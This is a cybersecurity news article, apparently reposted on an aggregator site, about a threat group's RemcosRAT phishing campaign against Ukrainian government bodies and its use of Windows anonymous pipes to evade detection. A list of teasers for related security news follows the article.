Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign

A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is back at it again, this time with a new tactic for transferring data without triggering endpoint detection and response systems.
The adversary, tracked as UNC-0050, is focused on Ukrainian government entities in its latest campaign.
Researchers at Uptycs who spotted it said the attacks may be politically motivated, with the goal of collecting specific intelligence from Ukrainian government agencies.
The RemcosRAT Threat Threat actors have been using RemcosRAT - which started life as a legitimate remote administration tool - to control compromised systems since at least 2016.
Among other things, the tool allows attackers to gather and exfiltrate system, user, and processor information.
It can bypass many antivirus and endpoint threat detection tools and execute a variety of backdoor commands.
In many instances threat actors have distributed the malware in attachments in phishing emails.
Uptycs has not been able to determine the initial attack vector in the latest campaign just yet but said it is leaning toward job-themed phishing and spam emails as most likely being the malware distribution method.
The security vendor based its assessments on emails it reviewed that purported to offer targeted Ukrainian military personnel with consultancy roles at Israel's Defense Forces.
The infection chain itself begins with a.lnk file that gathers information about the compromised system and then retrieves an HTML app named 6.hta from an attacker-controlled remote server using a Windows native binary, Uptycs said.
The retrieved app contains a PowerShell script that initiates steps to download two other payload files from an attacker-controlled domain and - ultimately - to install RemcosRAT on the system.
A Somewhat Rare Tactic What makes UNC-0050's new campaign different is the threat actor's use of a Windows interprocess communications feature called anonymous pipes to transfer data on compromised systems.
As Microsoft describes it, an anonymous pipe is a one-way communications channel for transferring data between a parent and a child process.
UNC-0050 is taking advantage of the feature to covertly channel data without triggering any EDR or antivirus alerts, Kathiresan and Trivedi said.
UNC-0050 is not the first threat actor to use pipes to exfiltrate stolen data, but the tactic remains relatively rare, the Uptycs researchers noted.
This is far from the first time that security researchers have spotted UAC-0050 attempting to distribute RemcosRAT to targets in Ukraine.
On multiple occasions last year, Ukraine's Computer Emergency Response Team warned of campaigns by the threat actor to distribute the remote access Trojan to organizations in the country.
The most recent was an advisory on Dec. 21, 2023, about a mass phishing campaign involving emails with an attachment that purported be a contract involving Kyivstar, one of Ukraine's largest telecommunications providers.
The emails contained an attachment in the form of an archive file or RAR file.
CERT-UA issued similar alerts on three other occasions last year, one in November with court subpoena-themed emails serving as the initial delivery vehicle; another, also in November, with emails allegedly from Ukraine's security service; and the first in February 2023 about a mass email campaign with attachments that appeared to be associated with a district court in Kyiv.


This Cyber News was published on www.darkreading.com. Publication date: Fri, 05 Jan 2024 01:30:15 +0000


Cyber News related to Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign

Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign - A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is back at it again, this time with a new tactic for transferring data without triggering endpoint detection and response ...
11 months ago Darkreading.com
How to perform a proof of concept for automated discovery using Amazon Macie | AWS Security Blog - After reviewing the managed data identifiers provided by Macie and creating the custom data identifiers needed for your POC, it’s time to stage data sets that will help demonstrate the capabilities of these identifiers and better understand how ...
2 months ago Aws.amazon.com
Ukraine Targeted by UAC-0050 Using Remcos RAT Pipe Method - Remcos RAT is a type of Remote Access Trojan used for unauthorized access and control of a computer system. It allows threat actors to perform various malicious activities like:-. Cybersecurity researchers at Uptycs recently discovered that the ...
11 months ago Gbhackers.com
Key Group uses leaked builders of ransomware and wipers | Securelist - The first discovered sample of Key Group, the Xorist ransomware, established persistence in the system by changing file extension associations. The .huis_bn extension added to encrypted files in the early versions of Key Group samples, Xorist and ...
2 months ago Securelist.com
TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793 - As part of this analysis, we look at threat actor TTPs employed throughout the intrusion and how they were identified and pieced together by the FortiGuard IR team. The following section of this report focuses on the activities of one of these threat ...
1 year ago Feeds.fortinet.com
CVE-2008-7092 - Multiple cross-site scripting (XSS) vulnerabilities in Unica Affinium Campaign 7.2.1.0.55 allow remote attackers to inject arbitrary web script or HTML via a Javascript event in the (1) url, (2) PageName, and (3) title parameters in a ...
7 years ago
Staying ahead of threat actors in the age of AI - At the same time, it is also important for us to understand how AI can be potentially misused in the hands of threat actors. In collaboration with OpenAI, today we are publishing research on emerging threats in the age of AI, focusing on identified ...
10 months ago Microsoft.com
Hackers target new MOVEit Transfer critical auth bypass bug - Threat actors are already trying to exploit a critical authentication bypass flaw in Progress MOVEit Transfer, less than a day after the vendor disclosed it. MOVEit Transfer is a managed file transfer solution used in enterprise environments to ...
5 months ago Bleepingcomputer.com
Data Diodes: One-Way Information Transfer - A flash drive used to deliver data to an isolated network segment could unintentionally become a vessel for confidential information to leave the company. For about a decade, there has been a much more elegant and technologically advanced solution ...
1 year ago Feeds.dzone.com
MOVEit Transfer Flaws Push Security Defense Into a Race With Attackers - Attackers appear to be pounding away at a couple of critical bugs that Progress Software disclosed this week in its MOVEit file transfer application, with nearly the same ferocity as they did the zero-day flaw the company disclosed almost exactly a ...
5 months ago Darkreading.com
'The Mask' Espionage Group Resurfaces After 10-Year Hiatus - An advanced persistent threat group that has been missing in action for more than a decade has suddenly resurfaced in a cyber-espionage campaign targeting organizations in Latin America and Central Africa. Over that period, the Spanish-speaking ...
7 months ago Darkreading.com
'The Mask' Espionage Group Resurfaces After 10-Year Hiatus - An advanced persistent threat group that has been missing in action for more than a decade has suddenly resurfaced in a cyber-espionage campaign targeting organizations in Latin America and Central Africa. Over that period, the Spanish-speaking ...
7 months ago Darkreading.com
New 'GambleForce' Threat Actor Behind String of SQL Injection Attacks - Researchers have spotted a new threat actor targeting organizations in the Asia-Pacific region with SQL injection attacks using nothing more than publicly available, open source penetration-testing tools. The GambleForce Campaign In a report this ...
1 year ago Darkreading.com
What Is Threat Modeling? - Threat modeling emerges as a pivotal process in this landscape, offering a structured approach to identify, assess, and address potential security threats. Threat Modeling Adoption and Implementation The successful adoption of threat modeling within ...
11 months ago Feeds.dzone.com
Top 7 Cyber Threat Hunting Tools for 2024 - Cyber threat hunting is a proactive security measure taken to detect and neutralize potential threats on a network before they cause significant damage. To seek out this type of threat, security professionals use cyber threat-hunting tools. With ...
10 months ago Techrepublic.com
What Is Cyber Threat Hunting? - Cyber threat hunting involves proactively searching for threats on an organization's network that are unknown to traditional cybersecurity solutions. A recent report from Armis found that cyber attack attempts increased by 104% in 2023, underscoring ...
10 months ago Techrepublic.com
How to Use Threat Intelligence Feeds for SOC/DFIR Teams - Threat intelligence feeds provide real-time updates on indicators of compromise, such as malicious IPs and URLs. Security systems can then ingest these IOCs to identify and block potential threats, which essentially grants organizations immunity to ...
7 months ago Cybersecuritynews.com
NCC Group records the most ransomware victims ever in 2023 - While coordinated law enforcement action and government initiatives helped in the fight against ransomware last year, NCC Group still recorded an 84% increase in attacks during 2023. The report included data from NCC Group's Cyber Incident Response ...
10 months ago Techtarget.com
How machine learning helps us hunt threats | Securelist - In this post, we will share our experience hunting for new threats by processing Kaspersky Security Network (KSN) global threat data with ML tools to identify subtle new Indicators of Compromise (IoCs). The model can process and learn from millions ...
2 months ago Securelist.com
How to Overcome the Most Common Challenges with Threat Intelligence - Today's typical approach to threat intelligence isn't putting organizations in a place to do that. Instead, many threat intelligence tools are delivering too much uncurated and irrelevant information that arrives too late to act upon. Organizations ...
11 months ago Cyberdefensemagazine.com
Global malspam targets hotels, spreading Redline and Vidar stealers - The latest global malspam campaign targets the hotel industry, emphasizing the need to stay alert against such attacks at all times. Cybersecurity researchers at Sophos X-Ops have issued a warning to the hospitality industry about a sophisticated ...
1 year ago Hackread.com
Threat actors misuse OAuth applications to automate financially driven attacks - Threat actors are misusing OAuth applications as an automation tool in financially motivated attacks. Threat actors compromise user accounts to create, modify, and grant high privileges to OAuth applications that they can misuse to hide malicious ...
1 year ago Microsoft.com
New Tool Set Found Used Against Organizations in the Middle East, Africa and the US - Unit 42 researchers observed a series of apparently related attacks against organizations in the Middle East, Africa and the U.S. We will discuss a set of tools used in the course of the attacks that reveal clues about the threat actors' activity. We ...
1 year ago Unit42.paloaltonetworks.com
Proofpoint Exposes Sophisticated Social Engineering Attack on Recruiters That Infects Their Computers With Malware - Recruiters and anyone else involved in hiring processes should be knowledgeable about this social engineering attack threat. A new report from U.S.-based cybersecurity company Proofpoint exposes a new attack campaign operated by a ...
1 year ago Techrepublic.com
Buzzing on Christmas Eve: Trigona Ransomware in 3 Hours - In late December 2022, we observed threat actors exploiting a publicly exposed Remote Desktop Protocol host, leading to data exfiltration and the deployment of Trigona ransomware. On Christmas Eve, within just three hours of gaining initial access, ...
10 months ago Thedfirreport.com

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)